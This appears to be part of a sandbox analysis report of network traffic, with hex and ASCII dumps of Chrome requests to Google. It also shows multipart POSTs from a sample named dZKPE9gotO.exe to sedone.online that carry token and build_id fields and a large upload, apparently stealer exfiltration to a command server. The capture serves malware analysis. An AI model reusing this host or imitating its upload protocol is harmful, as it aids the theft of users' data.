                                                                                                                                                                                                                                                2024-12-16 14:39:51 UTC372INData Raw: 31 38 30 30 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                Data Ascii: 1800)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                2024-12-16 14:39:51 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                2024-12-16 14:39:51 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                2024-12-16 14:39:51 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                2024-12-16 14:39:51 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                2024-12-16 14:39:51 UTC220INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 35 35 2c 33 37 30 30 34 33 39 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 0d 0a
                                                                                                                                                                                                                                                Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700255,3700439,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthi
                                                                                                                                                                                                                                                2024-12-16 14:39:51 UTC224INData Raw: 64 61 0d 0a 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 43 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 66 6f 72 28 76 61 72 20 64 20 6f 66 20 63 29 5f 2e 43 64 28 61 2c 62 2c 64 29 3b 65 6c 73 65 7b 64 5c 75 30 30 33 64 28 30 2c 5f 2e 7a 29 28 61 2e 43 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30 30 33 64 65 3b 61 2e 42 5b 65 0d 0a
                                                                                                                                                                                                                                                Data Ascii: das.gbar_||{};(function(_){var window\u003dthis;\ntry{\n_.Cd\u003dfunction(a,b,c){if(!a.j)if(c instanceof Array)for(var d of c)_.Cd(a,b,d);else{d\u003d(0,_.z)(a.C,a,b);const e\u003da.v+c;a.v++;b.dataset.eqid\u003de;a.B[e
                                                                                                                                                                                                                                                2024-12-16 14:39:51 UTC1390INData Raw: 38 30 30 30 0d 0a 5d 5c 75 30 30 33 64 64 3b 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 63 2c 64 2c 21 31 29 3a 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 74 74 61 63 68 45 76 65 6e 74 3f 62 2e 61 74 74 61 63 68 45 76 65 6e 74 28 5c 22 6f 6e 5c 22 2b 63 2c 64 29 3a 61 2e 6f 2e 6c 6f 67 28 45 72 72 6f 72 28 5c 22 42 60 5c 22 2b 62 29 29 7d 7d 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 44 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 2e 67 62 5f 49 20 2e 67 62 5f 41 5c 22 29 2c 45 64 5c 75 30 30 33 64 64
                                                                                                                                                                                                                                                Data Ascii: 8000]\u003dd;b\u0026\u0026b.addEventListener?b.addEventListener(c,d,!1):b\u0026\u0026b.attachEvent?b.attachEvent(\"on\"+c,d):a.o.log(Error(\"B`\"+b))}};\n}catch(e){_._DumpException(e)}\ntry{\nvar Dd\u003ddocument.querySelector(\".gb_I .gb_A\"),Ed\u003dd
                                                                                                                                                                                                                                                2024-12-16 14:39:51 UTC1390INData Raw: 74 70 73 5c 22 29 2c 4c 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 4c 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 4b 64 28 61 5c 75 30 30 33 64 5c 75 30 30 33 65 2f 5e 5b 5e 3a 5d 2a 28 5b 2f 3f 23 5d 7c 24 29 2f 2e 74 65 73 74 28 61 29 29 5d 3b 5f 2e 51 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 5f 2e 52 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 51 64 28 5f 2e 4d 64 3f 5f 2e 4d 64 2e 65 6d 70 74 79 48 54 4d 4c 3a 5c 22 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 56 64 2c 69 65
                                                                                                                                                                                                                                                Data Ascii: tps\"),Ld(\"mailto\"),Ld(\"ftp\"),new _.Kd(a\u003d\u003e/^[^:]*([/?#]|$)/.test(a))];_.Qd\u003dclass{constructor(a){this.i\u003da}toString(){return this.i+\"\"}};_.Rd\u003dnew _.Qd(_.Md?_.Md.emptyHTML:\"\");\n}catch(e){_._DumpException(e)}\ntry{\nvar Vd,ie
                                                                                                                                                                                                                                                2024-12-16 14:39:51 UTC1390INData Raw: 2e 65 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 50 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 72 72 61 79 5c 22 7c 7c 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6f 62 6a 65 63 74 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 7d 3b 5f 2e 66 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 5f 2e 75 62 28 61 2c 62 2c 63 2c 21 31 29 21 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 7d 3b 5f 2e 67 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 54 64 28 5f 2e 4c 63 28 61
                                                                                                                                                                                                                                                Data Ascii: .ee\u003dfunction(a){var b\u003d_.Pa(a);return b\u003d\u003d\"array\"||b\u003d\u003d\"object\"\u0026\u0026typeof a.length\u003d\u003d\"number\"};_.fe\u003dfunction(a,b,c){return _.ub(a,b,c,!1)!\u003d\u003dvoid 0};_.ge\u003dfunction(a,b){return _.Td(_.Lc(a


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                10192.168.2.749749172.217.21.364437704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:39:50 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-16 14:39:50 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Version: 704583840
                                                                                                                                                                                                                                                Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:39:50 GMT
                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                2024-12-16 14:39:50 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                2024-12-16 14:39:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                11192.168.2.749765116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:39:54 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----MGDJMO8GV3WBIMG4EK6X
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 505
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:39:54 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 47 44 4a 4d 4f 38 47 56 33 57 42 49 4d 47 34 45 4b 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 4d 47 44 4a 4d 4f 38 47 56 33 57 42 49 4d 47 34 45 4b 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4d 47 44 4a 4d 4f 38 47 56 33 57 42 49 4d 47 34 45 4b 36 58 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------MGDJMO8GV3WBIMG4EK6XContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------MGDJMO8GV3WBIMG4EK6XContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------MGDJMO8GV3WBIMG4EK6XCont
                                                                                                                                                                                                                                                2024-12-16 14:39:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:39:54 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-16 14:39:55 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                12192.168.2.749770116.203.12.1144432000C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-16 14:39:55 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----SJMO89RQIEUAAASJ5PP8
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 213453
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-16 14:39:55 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 53 4a 4d 4f 38 39 52 51 49 45 55 41 41 41 53 4a 35 50 50 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 61 66 61 30 62 64 33 34 33 61 64 31 39 66 39 32 30 30 61 31 38 31 66 61 38 33 34 38 39 61 61 0d 0a 2d 2d 2d 2d 2d 2d 53 4a 4d 4f 38 39 52 51 49 45 55 41 41 41 53 4a 35 50 50 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 53 4a 4d 4f 38 39 52 51 49 45 55 41 41 41 53 4a 35 50 50 38 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------SJMO89RQIEUAAASJ5PP8Content-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------SJMO89RQIEUAAASJ5PP8Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------SJMO89RQIEUAAASJ5PP8Cont
                                                                                                                                                                                                                                                2024-12-16 14:39:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:39:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-16 14:39:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
